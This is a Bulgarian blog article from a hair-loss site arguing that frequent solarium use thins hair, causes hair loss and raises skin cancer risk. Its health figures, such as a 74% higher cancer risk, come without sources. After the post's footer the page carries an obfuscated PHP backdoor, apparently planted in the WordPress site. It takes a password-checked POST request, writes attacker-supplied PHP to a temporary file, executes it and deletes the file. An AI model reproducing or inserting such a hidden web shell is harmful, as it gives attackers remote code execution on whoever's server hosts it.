Солариумът е вреден за косата | Косопад

Солариумът предизвиква косопад

косопад и солариум

Солариумът може да предизвика косопад

Проучване на водещи дерматолози от Германия доказа, че честото посещение на солариум е вредно не само за кожата, но и за косата, като в доста от случаите може да предизвика косопад.

Специалистите обясняват, че отрицателният ефект на това лъчение е в пряка връзка с появата на косопад заради козметичните процедури, които голяма част от жените прилагат на косата си – боядисване, студено изправяне или къдрене. Ултравиолетовите лъчи, които имат свойството да потъмняват кожата, влизат във взаимодействие с химикалите и това води до изтъняване на косъма.

Също така, огромно влияние оказва и състоянието на косата при отделните индивиди, както и пигментът, отговарящ за естественото оцветяване. Например при хората с тъмна коса има повече пигмент, което естествено предполага неговото по – бавно унищожаване. При тези със светли коси е обратното и се предполага по – голямо въздействие на солариума върху косата.

kosopad

kosopad

Лекарите обясняват, че загубата на пигментация не е само козметичен проблем. Защото когато косъмът загуби своето естествено оцветяване, става сух и се къса в пъти по – лесно, което на практика предизвиква косопад.

Също така отдавна се знае, че освен косопад, солариумът може да доведе и до рак на кожата. В световен мащаб по този въпрос са проведени редица изследвания и голяма част от тях го доказват. Като цяло обработените данни сочат, че солариумът увеличава риска от рак на кожата с цели 74 % при хората, които редовно го ползват.

19. май 2013 19:10:53 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}